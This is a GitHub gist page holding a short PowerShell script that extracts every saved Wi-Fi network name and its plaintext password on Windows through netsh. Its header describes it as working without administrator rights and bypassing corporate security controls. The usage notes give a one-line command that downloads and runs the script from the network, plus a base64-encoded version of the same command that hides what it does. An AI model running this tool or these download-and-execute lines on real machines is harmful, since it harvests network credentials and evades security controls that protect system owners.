Last active
February 1, 2022 13:06
-
-
Save gfoss/c6a594d868d7a3efbc21b582aef32c3c to your computer and use it in GitHub Desktop.
Simple script to extract locally-stored Wi-Fi Credentials
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #====================================# | |
| # Extract Wi-Fi Credentials # | |
| # greg . foss @ owasp . org # | |
| # v0.1 -- July, 2017 # | |
| #====================================# | |
| # Licensed under the MIT License | |
| <# | |
| .Synopsis | |
| Simple script that extracts Wireless Network information and displays it in an easy-to-ready way | |
| Does not require administrative rights | |
| Bypasses standard Windows Corporate Security Controls (viewing plaintext credentials via the GUI) | |
| .Usage | |
| Local: | |
| PS: C\> Import-Module Extract-WiFi-Creds.ps1 | |
| Show All credentials: | |
| PS: C\> Extract-Wifi | |
| Show Particular Network Details: | |
| PS: C\> Extract-Wifi <SSID> | |
| Download and Execute: | |
| Plain: | |
| PS: C\> IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/gfoss/c6a594d868d7a3efbc21b582aef32c3c/raw/4103fcc20fef5630e931d27445542bbb6bf44917/Extract-WiFi-Creds.ps1'); Extract-Wifi | |
| Encoded: | |
| PS: C\> powershell -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAcwB0AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBnAGYAbwBzAHMALwBjADYAYQA1ADkANABkADgANgA4AGQANwBhADMAZQBmAGIAYwAyADEAYgA1ADgAMgBhAGUAZgAzADIAYwAzAGMALwByAGEAdwAvADQAMQAwADMAZgBjAGMAMgAwAGYAZQBmADUANgAzADAAZQA5ADMAMQBkADIANwA0ADQANQA1ADQAMgBiAGIAYgA2AGIAZgA0ADQAOQAxADcALwBFAHgAdAByAGEAYwB0AC0AVwBpAEYAaQAtAEMAcgBlAGQAcwAuAHAAcwAxACcAKQA7ACAARQB4AHQAcgBhAGMAdAAtAFcAaQBmAGkA | |
| #> | |
| function Extract-Wifi { | |
| [CmdLetBinding()] | |
| param( [string]$network ) | |
| if ( $network ) { | |
| Write-Host "" | |
| Write-Host "" | |
| Write-Host "Wireless Network Details:" -ForegroundColor Cyan | |
| Write-Host "===================================" -ForegroundColor Gray | |
| netsh.exe wlan show profiles name=$network key=clear | |
| Write-Host "===================================" -ForegroundColor Gray | |
| Write-Host "" | |
| } else { | |
| $networks = netsh.exe wlan show profiles key=clear | findstr "All" | |
| $networkNames = @($networks.Split(":") | findstr -v "All").Trim() | |
| Write-Host "" | |
| Write-Host "" | |
| Write-Host "Wireless Networks and Passwords" -ForegroundColor Cyan | |
| Write-Host "===================================" -ForegroundColor Gray | |
| Write-Host "" | |
| Write-Host "SSID : Password"-ForegroundColor Gray | |
| $result = New-Object -TypeName PSObject | |
| foreach ( $ap in $networkNames ) { | |
| try { | |
| $password = netsh.exe wlan show profiles name=$ap key=clear | findstr "Key" | findstr -v "Index" | |
| $passwordDetail = @($password.Split(":") | findstr -v "Key").Trim() | |
| #if ( -Not $password ) { | |
| # $password = netsh.exe wlan show profiles name=$ap key=clear | findstr "Auth" | |
| # $passwordDetail = "$password" | |
| #} | |
| Write-Host "$ap" -NoNewline | |
| Write-Host " : " -NoNewline | |
| Write-Host "$passwordDetail" -ForegroundColor Green | |
| } catch { | |
| Write-Host "Unable to obtain password for $ap - Likely using 802.1x or Open Network" -ForegroundColor Red | |
| } | |
| } | |
| Write-Host "" | |
| Write-Host "===================================" -ForegroundColor Gray | |
| Write-Host "" | |
| } | |
| Get-Variable | Remove-Variable -EA 0 | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment